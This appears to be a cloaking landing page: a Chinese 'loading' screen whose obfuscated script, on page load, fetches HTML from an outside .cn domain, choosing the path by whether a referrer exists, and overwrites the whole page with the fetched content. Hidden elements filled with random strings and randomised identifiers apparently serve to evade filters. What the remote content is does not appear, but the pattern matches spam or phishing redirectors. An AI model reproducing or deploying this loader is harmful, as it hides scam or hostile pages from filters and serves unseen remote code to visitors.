<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .SwiS7Nmch {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .SwiS7Nmch .kMlY1J {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .SwiS7Nmch .content {
            line-height: 50px;
            text-align: center
        }

        .SwiS7Nmch .img {
            width: 100%
        }

        .SwiS7Nmch .sRQH9egsZ {
            text-align: center
        }

        .SwiS7Nmch .sRQH9egsZ span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .SwiS7Nmch .sRQH9egsZ span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .SwiS7Nmch .sRQH9egsZ span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .SwiS7Nmch .sRQH9egsZ span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .SwiS7Nmch .sRQH9egsZ span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .SwiS7Nmch .sRQH9egsZ span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .SwiS7Nmch .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function cy1LQ7xnNu4(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var oqrhH = cy1LQ7xnNu4('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ oqrhH +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ oqrhH +".html?a=share";
		}
		
        fJ9R2gVWW0=url+"#"+new Date().getTime();
        fJ9R2gVWW0 && function() {
            $.get(fJ9R2gVWW0, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>Qwgt6r9iAREH3L4z5crlfSRDrA9aezGtwdQbrH3kkO6fKUaoqz8SV3m7y4i61EjqEOXlszfoHy5PtqeJIRVFg74XxcecoLqc</span>
<span style='display:none'>Qwgt6r9iAREH3L4z5crlfSRDrA9aezGtwdQbrH3kkO6fKUaoqz8SV3m7y4i61EjqEOXlszfoHy5PtqeJIRVFg74XxcecoLqc</span>
<a  href='#' style='display:none'>Bsqxy4fTPrP4qTnYx2FofItaf46p4wBM7JukFqyFKmdARg6uS1FFjq5S7anY</a>
<h1 style='display:none' >PEfALzqNK5Y6U1o0xSg1KYPiwrs5pHryrDznE7V</h1><div class="SwiS7Nmch">
    <div class="kMlY1J">
        <div class="sRQH9egsZ">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >qH4zihkLunzQidtGG4KdAr2Ih0chbFblCUDp3fWIaX09QJGZMEotpbtEnOwFZTsa</li>
<ul style='display:none' >F53f36AwQ18Ww5ZO0wvcBTTb38z6yNxO9BYbnvJJv2c71dajID</ul>
<li style='display:none' >qH4zihkLunzQidtGG4KdAr2Ih0chbFblCUDp3fWIaX09QJGZMEotpbtEnOwFZTsa</li>
<div style='display:none'>EpTZrCdEz6L3M7UaUYjG7SEszJUrNk5E9IbCmepCEcKmLn5veik8J</div>
<img  src='' style='display:none'>
<p  style='display:none'>HPCLEK3nvsWduyiiTgV1ZRerS08tg1XyiewkEs6QMIWWemGTn7V0SQCKD</p>
<li style='display:none' >qH4zihkLunzQidtGG4KdAr2Ih0chbFblCUDp3fWIaX09QJGZMEotpbtEnOwFZTsa</li>
<span style='display:none'>U1MiksWHVkxSePA3xmLbSamWJZ6jmSJobn1b</span></body>
</html>